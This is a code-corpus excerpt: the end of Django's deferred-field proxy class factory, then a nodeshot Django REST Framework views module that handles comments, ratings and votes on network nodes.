deferred attributes to a particular instance of the model. """ class Meta: proxy = True app_label = model._meta.app_label # The app_cache wants a unique name for each model, otherwise the new class # won't be created (we get an old one back). Therefore, we generate the # name using the passed in attrs. It's OK to reuse an existing class # object if the attrs are identical. name = "%s_Deferred_%s" % (model.__name__, '_'.join(sorted(list(attrs)))) name = util.truncate_name(name, 80, 32) overrides = dict([(attr, DeferredAttribute(attr, model)) for attr in attrs]) overrides["Meta"] = Meta overrides["__module__"] = model.__module__ overrides["_deferred"] = True return type(name, (model,), overrides) # The above function is also used to unpickle model instances with deferred # fields. deferred_class_factory.__safe_for_unpickling__ = True
bsd-3-clause
chachan/nodeshot
nodeshot/community/participation/views.py
5
2627
from django.utils.translation import ugettext_lazy as _ from django.shortcuts import get_object_or_404 from django.contrib.auth import get_user_model User = get_user_model() from rest_framework import permissions, authentication, generics from rest_framework.response import Response from nodeshot.core.nodes.models import Node from .models import Rating, Vote, Comment from .serializers import * # noqa class NodeRelationViewMixin(object): def initial(self, request, *args, **kwargs): """ Custom initial method: * ensure node exists and store it in an instance attribute * change queryset to return only comments of current node """ super(NodeRelationViewMixin, self).initial(request, *args, **kwargs) self.node = get_object_or_404(Node, **{'slug': self.kwargs['slug']}) self.queryset = self.model.objects.filter(node_id=self.node.id) def perform_create(self, serializer): serializer.save(user=self.request.user) class NodeComments(NodeRelationViewMixin, generics.ListCreateAPIView): """ ### GET Retrieve a **list** of comments for the specified node ### POST Add a comment to the specified node """ authentication_classes = (authentication.SessionAuthentication,) permission_classes = (permissions.IsAuthenticatedOrReadOnly,) serializer_class = CommentSerializer model = Comment node_comments = NodeComments.as_view() class NodeRatings(NodeRelationViewMixin, generics.CreateAPIView): """ ### POST Rate the specified node """ authentication_classes = (authentication.SessionAuthentication,) permission_classes = (permissions.IsAuthenticatedOrReadOnly,) serializer_class = RatingSerializer model = Rating node_ratings = NodeRatings.as_view() class NodeVotes(NodeRelationViewMixin, generics.CreateAPIView): """ ### POST Vote for the specified node """ authentication_classes = (authentication.SessionAuthentication,) permission_classes = (permissions.IsAuthenticatedOrReadOnly,) serializer_class = VoteSerializer model = Vote def delete(self, *args, **kwargs): votes = Vote.objects.filter(node_id=self.node.id, user_id=self.request.user.id) if (len(votes) > 0): for vote in votes: vote.delete() message = _('Vote for this node removed') status = 200 else: message = _('User has not voted this node yet') status = 400 return Response({'details': message}, status=status) node_votes = NodeVotes.as_view()
gpl-3.0